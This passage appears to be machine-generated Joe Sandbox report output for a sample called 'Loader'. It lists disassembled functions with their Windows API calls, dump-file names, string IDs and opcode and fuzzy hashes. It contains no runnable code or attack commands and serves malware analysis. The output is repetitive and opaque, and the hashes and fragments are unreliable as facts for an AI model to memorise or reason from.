                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                              • API String ID: 667068680-295688737
                                                                                              • Opcode ID: 0ccc923999a738c5421e1871643c16f76cd43b5ed43f44c69dd01ca9ba76eea2
                                                                                              • Instruction ID: fbb3c6adcd2cf170df4c1460f3ab6b59fed62b981590b2097c6802d1234e9b81
                                                                                              • Opcode Fuzzy Hash: 0ccc923999a738c5421e1871643c16f76cd43b5ed43f44c69dd01ca9ba76eea2
                                                                                              • Instruction Fuzzy Hash: 40618771952750AFD704EFF6AC4D8C63BACAF49705310941AB21DF3262EBB460C99F61
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E5CF90
                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00E5D216
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cpp_errorCurrentThreadThrow_std::_
                                                                                              • String ID:
                                                                                              • API String ID: 350343453-0
                                                                                              • Opcode ID: 7cf2642c18cd6a5771b669598e5b1e307b49212b69e18c60871cef74136852cb
                                                                                              • Instruction ID: 091f629d23465191bd90703ecbd71c4bd2c4e796ad137bad68182075777535a2
                                                                                              • Opcode Fuzzy Hash: 7cf2642c18cd6a5771b669598e5b1e307b49212b69e18c60871cef74136852cb
                                                                                              • Instruction Fuzzy Hash: ABF12B76E505104FEF008A7CC8B93DF2BE28B66335F2A2729DA746B7D2D62744098F50
                                                                                              APIs
                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00E6C8CB
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00E6C9BF
                                                                                              • FindClose.KERNEL32(00000000), ref: 00E6C9FE
                                                                                              • FindClose.KERNEL32(00000000), ref: 00E6CA31
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 1164774033-0
                                                                                              • Opcode ID: 146762387c7b66ade44d2198bbf32722fc01b46849d89ba97179723c1768a89b
                                                                                              • Instruction ID: e4eae14a67bf7f0cd44b4eb7c01336f9017c69a1c7f905dd9402f4381eb00e93
                                                                                              • Opcode Fuzzy Hash: 146762387c7b66ade44d2198bbf32722fc01b46849d89ba97179723c1768a89b
                                                                                              • Instruction Fuzzy Hash: 6F71D37198411C9EDF34EF74AC89ABABBB9AF45384F2451D9E08DB3211DB305E858F50
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E65450
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00E6551C
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E6553C
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00E65546
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: ea6f80baccf107dd6249f4681339e261e4dc89bbc9c9691bf19de7a715d86ccb
                                                                                              • Instruction ID: 183bcaf11ec896e58961dbb717fa33f1b16e2e66165ac61c64aeda76c44ce028
                                                                                              • Opcode Fuzzy Hash: ea6f80baccf107dd6249f4681339e261e4dc89bbc9c9691bf19de7a715d86ccb
                                                                                              • Instruction Fuzzy Hash: 92310775D452189BDB20DFA4D989BCDBBF8AF08344F1040AAE40DAB251EB709A89CF45
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00E67EC2
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00E67ECC
                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00E67ED9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: 1e21c0d33be742d9a327688676c5c2ab370b201d3f388aaf690713ae998b5de2
                                                                                              • Instruction ID: 797a279ec8bb4177df8ac18d4ea328f93befb1138f19db5f74358daee9098de6
                                                                                              • Opcode Fuzzy Hash: 1e21c0d33be742d9a327688676c5c2ab370b201d3f388aaf690713ae998b5de2
                                                                                              • Instruction Fuzzy Hash: 2031D2749512299BCB21DF24EC88B8DBBF8BF08354F5051EAE41CA7291EB749F858F44
                                                                                              APIs
                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00E62437
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___std_exception_destroy
                                                                                              • String ID:
                                                                                              • API String ID: 4194217158-0
                                                                                              • Opcode ID: c6a361f801270cd151bfeb507ce9625e2fa036a3d6eae663193e9ef81d00a325
                                                                                              • Instruction ID: 472671a1b4c418a69cf4e599b6ee81b17c8a71c71507d5de903d7ca42b4cbf0b
                                                                                              • Opcode Fuzzy Hash: c6a361f801270cd151bfeb507ce9625e2fa036a3d6eae663193e9ef81d00a325
                                                                                              • Instruction Fuzzy Hash: 2EA26B66A555844FEF024AB884B93DF6FE24B6B730F6A2755C6F06F2D3D50B000B9B60
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: -g}5
                                                                                              • API String ID: 0-4071012034
                                                                                              • Opcode ID: edb77509972b76bb99687d626d38a4ffa084c87776c79b4261e09a38578a014f
                                                                                              • Instruction ID: 91d93655e391d92c431310cb9e004204c667e46d467365d8ab1ba2b0c0359680
                                                                                              • Opcode Fuzzy Hash: edb77509972b76bb99687d626d38a4ffa084c87776c79b4261e09a38578a014f
                                                                                              • Instruction Fuzzy Hash: 0692AAA6A556C45FEF024AB8D4A93DF6FF24B6B331F5E2B5586E01F2D3C507004A9B10
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E71F2D,?,?,00000008,?,?,00E71AFF,00000000), ref: 00E721FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 61afc907c8035f9db012528e41d1f13880227507f039e5bd91f8a14a6b7e6a0b
                                                                                              • Instruction ID: 311c9e045b0b019c0016c58bdd5c88e850a291bc1850c7262d2078db432689ff
                                                                                              • Opcode Fuzzy Hash: 61afc907c8035f9db012528e41d1f13880227507f039e5bd91f8a14a6b7e6a0b
                                                                                              • Instruction Fuzzy Hash: 08B16D316106089FDB15CF28C48ABA57BE0FF45368F25D65CEA99DF2A2C335D992CB40
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E65216
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: 78c2e0d533d880f4b1431462b2cf4958cbe0c6a590468a3f7fcf20dd48bd01c4
                                                                                              • Instruction ID: 86ed0cc42b2410f7110af88ecf21e19275f272752199aca7fd01f6846c8c5abb
                                                                                              • Opcode Fuzzy Hash: 78c2e0d533d880f4b1431462b2cf4958cbe0c6a590468a3f7fcf20dd48bd01c4
                                                                                              • Instruction Fuzzy Hash: 5C51D172A416098FDB14CF96E8817AEB7F4FB48798F24942AD505FB3A0D3B49944CF90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: k#fz
                                                                                              • API String ID: 0-1948189604
                                                                                              • Opcode ID: 238bcecc01ff6ea10ab987a46ade2d5f195b0d8165eef82d14d0185342dc19c4
                                                                                              • Instruction ID: ffb005e4c36590f09dba5d3d07a6bce3264650a15162210a888200e2b196f569
                                                                                              • Opcode Fuzzy Hash: 238bcecc01ff6ea10ab987a46ade2d5f195b0d8165eef82d14d0185342dc19c4
                                                                                              • Instruction Fuzzy Hash: 84D14272E115188FDB14CEBDC94069DB7F2AB88730F2A8729E875FB2D4D6349D458B80
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00015560), ref: 00E6543D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 9c429ba76442216161e19cbd25a55cb21fe7427f4c5826bfadfdd434282bb5ff
                                                                                              • Instruction ID: 1d2a360647fbd5acd6bef91dcccb210a78fbbfb312a866efa889a13d8b5caba9
                                                                                              • Opcode Fuzzy Hash: 9c429ba76442216161e19cbd25a55cb21fe7427f4c5826bfadfdd434282bb5ff
                                                                                              • Instruction Fuzzy Hash:
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: 390047477f0e210081f0e376c1abf136e81cd5c744b52d9625265439a76d979f
                                                                                              • Instruction ID: f42b6bdc4c2cd35b1d351a3a25f03e587fdaa72539365bf14d4114be66db7ef1
                                                                                              • Opcode Fuzzy Hash: 390047477f0e210081f0e376c1abf136e81cd5c744b52d9625265439a76d979f
                                                                                              • Instruction Fuzzy Hash: 3FA01130A022008F8B20CF33AA0820A3AA8AB0028230080AAA008E0220EB308088AB00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 43c024583933e6cfa14fb5def04e75230b4bc471037fc41026db4463fcef0bd9
                                                                                              • Instruction ID: 86a61cd0ccc8c697f9368920ac993bd5ee2c2a393d2aa02fc9d0c83997125eeb
                                                                                              • Opcode Fuzzy Hash: 43c024583933e6cfa14fb5def04e75230b4bc471037fc41026db4463fcef0bd9
                                                                                              • Instruction Fuzzy Hash: 3532C176E446844FEB018ABCC4A53DF6FF25B6B334F2A2719C5A46F3D6DA17040A8B50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ef320f7bef7c01a4762384d4d78eb5b32108a18fb7c2cff03b859285f90ef659
                                                                                              • Instruction ID: 88cc352f214717229e6c61705ecc831e863620d764cff472aed6326a2cfd618a
                                                                                              • Opcode Fuzzy Hash: ef320f7bef7c01a4762384d4d78eb5b32108a18fb7c2cff03b859285f90ef659
                                                                                              • Instruction Fuzzy Hash: B902C177A916504FEF01497CC8B83DB1FE787A7735E2A2726CAB05B2E2C55B004E9B50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 107ee8ecb09fa4e678585d3a4937c4d6286db83d542d2e710b8247c7152f53ca
                                                                                              • Instruction ID: 4effd7ea45b28e6de0349f7d3dd2e5277e529631248897b0f1bfde538aac1dce
                                                                                              • Opcode Fuzzy Hash: 107ee8ecb09fa4e678585d3a4937c4d6286db83d542d2e710b8247c7152f53ca
                                                                                              • Instruction Fuzzy Hash: 0DE11672A505504FDF008A7CC4A93DF2BE2476B335F2A2726DAB4AF7D2D61B180D9B50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2181f0c32b81b48caa156687f0fdc87524ada0d0e991219a6e36bcb24ef515b9
                                                                                              • Instruction ID: 3f6f6af00aab7a0ece0b7f4ef3e9b7450e8cbad05cf09747a014e06570b7bef2
                                                                                              • Opcode Fuzzy Hash: 2181f0c32b81b48caa156687f0fdc87524ada0d0e991219a6e36bcb24ef515b9
                                                                                              • Instruction Fuzzy Hash: B2D0923A645A58AFC310CF4AE840D42F7B8FB8DA70B154066EA08A3B20C331FC51CBE0
                                                                                              APIs
                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00E691F2
                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00E69300
                                                                                              • CatchIt.LIBVCRUNTIME ref: 00E69351
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00E69452
                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00E6946D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                              • String ID: 81$@]$csm$csm$csm
